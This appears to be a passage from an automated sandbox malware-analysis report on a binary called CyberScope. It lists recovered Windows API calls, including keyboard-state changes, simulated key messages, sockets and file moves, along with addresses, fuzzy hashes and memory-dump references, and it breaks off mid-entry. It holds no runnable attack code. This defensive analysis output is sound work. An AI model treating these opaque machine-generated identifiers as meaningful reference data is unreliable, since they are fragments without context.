                                                                                    • Instruction ID: 1a7c326632eb2b3c514b8befb01632deaf56f812f4dbb10a1250d15ca5243ec4
                                                                                    • Opcode Fuzzy Hash: bb2c4b4c14cdcaf748d0c23c7bfdaf7aae05718ef51b58f003a4cd3138775bce
                                                                                    • Instruction Fuzzy Hash: A171BC75A10225FFCB10EFA4E844AAEB7F1EF48310F108459E816AB251DB75AE42CB90
                                                                                    APIs
                                                                                    • GetParent.USER32(?), ref: 001FB8C0
                                                                                    • GetKeyboardState.USER32(?), ref: 001FB8D5
                                                                                    • SetKeyboardState.USER32(?), ref: 001FB936
                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 001FB964
                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 001FB983
                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 001FB9C4
                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001FB9E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: 529766c458c5a19c05a118e0f7b6e96a34623f972a959b89761824778bdd666d
                                                                                    • Instruction ID: 0b466ec7d92925f5ef11ebae5c4b2c4d38b4b9170414269e06b6f07d03e20d73
                                                                                    • Opcode Fuzzy Hash: 529766c458c5a19c05a118e0f7b6e96a34623f972a959b89761824778bdd666d
                                                                                    • Instruction Fuzzy Hash: D251B3E060C7D93EFB364234CC95BB67EA96B46708F088489E3D5468D2C3E8ADC4D750
                                                                                    APIs
                                                                                    • GetParent.USER32(00000000), ref: 001FB6E0
                                                                                    • GetKeyboardState.USER32(?), ref: 001FB6F5
                                                                                    • SetKeyboardState.USER32(?), ref: 001FB756
                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001FB782
                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001FB79F
                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001FB7DE
                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001FB7FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: 5f0965c6ffe9e14602328daa7f94b965aacb71dbde7000c70bb5839a435de76a
                                                                                    • Instruction ID: 6aefe8473a783495d57a4d4e8260f1dda5ba457d2795ddc0c18384dcef8b83b5
                                                                                    • Opcode Fuzzy Hash: 5f0965c6ffe9e14602328daa7f94b965aacb71dbde7000c70bb5839a435de76a
                                                                                    • Instruction Fuzzy Hash: 555125A0A0C7D93DFB329374CC95B76BEA95F45344F0C8589E2D84A8D2D394EC94D750
                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,001C5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 001C57E3
                                                                                    • __fassign.LIBCMT ref: 001C585E
                                                                                    • __fassign.LIBCMT ref: 001C5879
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 001C589F
                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,001C5F16,00000000,?,?,?,?,?,?,?,?,?,001C5F16,?), ref: 001C58BE
                                                                                    • WriteFile.KERNEL32(?,?,00000001,001C5F16,00000000,?,?,?,?,?,?,?,?,?,001C5F16,?), ref: 001C58F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    • Opcode ID: 9497987a19d7fbc6fe1ff08e66c17326d80521420fb10a23442af63ee5dee993
                                                                                    • Instruction ID: 8a260afc2d98862285bb5f352d0813df38a56e34d4016121246d4952d60668cc
                                                                                    • Opcode Fuzzy Hash: 9497987a19d7fbc6fe1ff08e66c17326d80521420fb10a23442af63ee5dee993
                                                                                    • Instruction Fuzzy Hash: CC51AF70A00649AFCB10CFA8D885FEEBBB9EF18310F14415EE956E7291D730E991CB60
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 001B30BB
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 001B30C3
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 001B3151
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 001B317C
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 001B31D1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 1170836740-1018135373
                                                                                    • Opcode ID: 09ff7e346b5c71f9f6718a36bf6af6a3b4d0b0bb66275692a3f8638c70fd415f
                                                                                    • Instruction ID: 9fa849efc379a58246cf34111c1bdd5eef5249480d67d0be8e20681ffce60a58
                                                                                    • Opcode Fuzzy Hash: 09ff7e346b5c71f9f6718a36bf6af6a3b4d0b0bb66275692a3f8638c70fd415f
                                                                                    • Instruction Fuzzy Hash: B7417334A00218ABCF10DF6CCC85ADEBBB9AF45364F158155E825AB392D731EB25CB91
                                                                                    APIs
                                                                                      • Part of subcall function 00213AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00213AD7
                                                                                      • Part of subcall function 00213AAB: _wcslen.LIBCMT ref: 00213AF8
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00211B6F
                                                                                    • WSAGetLastError.WSOCK32 ref: 00211B7E
                                                                                    • WSAGetLastError.WSOCK32 ref: 00211C26
                                                                                    • closesocket.WSOCK32(00000000), ref: 00211C56
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 2675159561-0
                                                                                    • Opcode ID: fa64cc9a776de87c8f5f82656416a7fe6cbb2e72f6bf030870d32a84b30a9a7f
                                                                                    • Instruction ID: 2e491d805d8e40693904df780f63c1294e75dfb8c59a97511a8503e29ce04f6c
                                                                                    • Opcode Fuzzy Hash: fa64cc9a776de87c8f5f82656416a7fe6cbb2e72f6bf030870d32a84b30a9a7f
                                                                                    • Instruction Fuzzy Hash: 92412631610105AFDB20DF64C848BEDB7E9EF60328F148059F9099B292D770ED92CBE1
                                                                                    APIs
                                                                                      • Part of subcall function 001FE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001FD7CD,?), ref: 001FE714
                                                                                      • Part of subcall function 001FE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001FD7CD,?), ref: 001FE72D
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 001FD7F0
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001FD82A
                                                                                    • _wcslen.LIBCMT ref: 001FD8B0
                                                                                    • _wcslen.LIBCMT ref: 001FD8C6
                                                                                    • SHFileOperationW.SHELL32(?), ref: 001FD90C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 3164238972-1173974218
                                                                                    • Opcode ID: 7347dc4b28d00f4a586618ebca56ee972dd984692621090020e671414bf724d6
                                                                                    • Instruction ID: efd06c5f864e57a2042caf33ebea5294f807b02dcf608af1d847cf3176d76c47
                                                                                    • Opcode Fuzzy Hash: 7347dc4b28d00f4a586618ebca56ee972dd984692621090020e671414bf724d6
                                                                                    • Instruction Fuzzy Hash: 8741767180521C9EDF12EBA4D985BFD77B9AF18380F5004EAE605EB151EB34A788CB50
                                                                                    APIs
                                                                                    • GetInputState.USER32 ref: 00204310
                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00204367
                                                                                    • TranslateMessage.USER32(?), ref: 00204390
                                                                                    • DispatchMessageW.USER32(?), ref: 0020439A
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002043AB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                    • String ID: (&
                                                                                    • API String ID: 2256411358-1801568203
                                                                                    • Opcode ID: 3d39a6560c16188085567f762dceaaa85ec99695764869f76fc25d8675d3324c
                                                                                    • Instruction ID: 8423b67563916e0bb89e612d4b1acdf238dc0dac1dd7205871b7b82940012d7c
                                                                                    • Opcode Fuzzy Hash: 3d39a6560c16188085567f762dceaaa85ec99695764869f76fc25d8675d3324c
                                                                                    • Instruction Fuzzy Hash: 6431BBB0524747DEEB38EF74E84CB7637A8AB01304F24D599D652C21E2D7F4A4A9CB11
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002238B8
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002238EB
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00223920
                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00223952
                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0022397C
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0022398D
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002239A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 2178440468-0
                                                                                    • Opcode ID: 5d839b04e3bb95f720484506482e779cb9a3ae50cee94cb9671fd16aac676efa
                                                                                    • Instruction ID: 742a5572cd9e42fc5134cb48c1376384ecfcd768f4ea602ae7f9c869c566a8e7
                                                                                    • Opcode Fuzzy Hash: 5d839b04e3bb95f720484506482e779cb9a3ae50cee94cb9671fd16aac676efa
                                                                                    • Instruction Fuzzy Hash: AD313631615266AFDB21CF88EC88F6437A5FB86710F245164F5049F2B1CBB8A9A5CB01
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001F80D0
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001F80F6
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001F80F9
                                                                                    • SysAllocString.OLEAUT32(?), ref: 001F8117
                                                                                    • SysFreeString.OLEAUT32(?), ref: 001F8120
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 001F8145
                                                                                    • SysAllocString.OLEAUT32(?), ref: 001F8153
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: 1953a76d4992e7de38751ff59fbe54291d9cb3acde40d12dd6da527832b44e0e
                                                                                    • Instruction ID: 66c0c0b207c8a30afc854248ae5847f4084e99ff650cef1a83676ead26d20e07
                                                                                    • Opcode Fuzzy Hash: 1953a76d4992e7de38751ff59fbe54291d9cb3acde40d12dd6da527832b44e0e
                                                                                    • Instruction Fuzzy Hash: CB21837660421DBF9F20EFA8DC88CBB73ACEB493607448525FA05DB290DB70ED468760
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001F81A9
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001F81CF
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001F81D2
                                                                                    • SysAllocString.OLEAUT32 ref: 001F81F3
                                                                                    • SysFreeString.OLEAUT32 ref: 001F81FC
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 001F8216
                                                                                    • SysAllocString.OLEAUT32(?), ref: 001F8224
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: 430c564403f6a9b10ec93fe3498be46077a771adc2b799d9dfa1b92e6118e7eb
                                                                                    • Instruction ID: b909cbb35c619f3ae074d74d5d7abfb5f6adefb5831a2fe65410860dccd94d54
                                                                                    • Opcode Fuzzy Hash: 430c564403f6a9b10ec93fe3498be46077a771adc2b799d9dfa1b92e6118e7eb
                                                                                    • Instruction Fuzzy Hash: 06214475604608BF9B14EBECEC89DBA77ECEB093607148125FA05CB1A0DB70EC42CB64
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00200E99
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00200ED5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandlePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 1424370930-2873401336
                                                                                    • Opcode ID: 093bfc26c4b019fce65805ddb76a1cf6e5e971e8f96a00e2c55e093327f4a4b1
                                                                                    • Instruction ID: 95465c5b67e1a796e9c2ff24f2c6089683fecc1f8e593f898c31582e7bcba7a9
                                                                                    • Opcode Fuzzy Hash: 093bfc26c4b019fce65805ddb76a1cf6e5e971e8f96a00e2c55e093327f4a4b1
                                                                                    • Instruction Fuzzy Hash: 1421917451030BABEB308F64DC88B9A77E8BF55320F200A19FCA5E72D1DB709861DB50
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00200F6D
                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00200FA8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandlePipe
                                                                                    • String ID: nul
                                                                                    • API String ID: 1424370930-2873401336
                                                                                    • Opcode ID: 1e6d067ade0c9fa3ee93e0005fdc9b208481be09d4ab5f0b4d86237178262b74
                                                                                    • Instruction ID: ad98f42456fa4dcad9f090128a4219adb2a1a8cc5e9355c2d3149d1c7d399e1f
                                                                                    • Opcode Fuzzy Hash: 1e6d067ade0c9fa3ee93e0005fdc9b208481be09d4ab5f0b4d86237178262b74
                                                                                    • Instruction Fuzzy Hash: 6F219135510306EBEB308F689C48B9977A9BF55720F200A19FCE1D32D2DB7198A1DB50
                                                                                    APIs
                                                                                      • Part of subcall function 00197873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001978B1
                                                                                      • Part of subcall function 00197873: GetStockObject.GDI32(00000011), ref: 001978C5
                                                                                      • Part of subcall function 00197873: SendMessageW.USER32(00000000,00000030,00000000), ref: 001978CF
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00224BB0
                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00224BBD
                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00224BC8
                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00224BD7
                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00224BE3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                    • String ID: Msctls_Progress32
                                                                                    • API String ID: 1025951953-3636473452
                                                                                    • Opcode ID: 6f3c2a776c9628d603b0dde7b80706b261f026026409f5539bf17d8515c72ebb
                                                                                    • Instruction ID: 1fe67147843eb8afe444198418c0d96a7bf481d4b700acb8843d791291c47cb9
                                                                                    • Opcode Fuzzy Hash: 6f3c2a776c9628d603b0dde7b80706b261f026026409f5539bf17d8515c72ebb
                                                                                    • Instruction Fuzzy Hash: 8F1193B155021ABEEF119EA4DC85EEB7F6DEF08798F014110BA08A2090CA71DC219BA4
                                                                                    APIs
                                                                                      • Part of subcall function 001CDB23: _free.LIBCMT ref: 001CDB4C
                                                                                    • _free.LIBCMT ref: 001CDBAD
                                                                                      • Part of subcall function 001C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,001CDB51,?,00000000,?,00000000,?,001CDB78,?,00000007,?,?,001CDF75,?), ref: 001C2D4E
                                                                                      • Part of subcall function 001C2D38: GetLastError.KERNEL32(?,?,001CDB51,?,00000000,?,00000000,?,001CDB78,?,00000007,?,?,001CDF75,?,?), ref: 001C2D60
                                                                                    • _free.LIBCMT ref: 001CDBB8
                                                                                    • _free.LIBCMT ref: 001CDBC3
                                                                                    • _free.LIBCMT ref: 001CDC17
                                                                                    • _free.LIBCMT ref: 001CDC22
                                                                                    • _free.LIBCMT ref: 001CDC2D
                                                                                    • _free.LIBCMT ref: 001CDC38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                    • Instruction ID: b61ae847bb6aa86e9197fef844c31e5b7f53458b462f9856fe498d3e1ac08118
                                                                                    • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                    • Instruction Fuzzy Hash: 3A112E72541B04BAD624BBB0DC07FDB77ECAF35B00F414C2DB29AAA252DB75F9448650
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 001FE328
                                                                                    • LoadStringW.USER32(00000000), ref: 001FE32F
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 001FE345
                                                                                    • LoadStringW.USER32(00000000), ref: 001FE34C
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001FE390
                                                                                    Strings
                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 001FE36D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
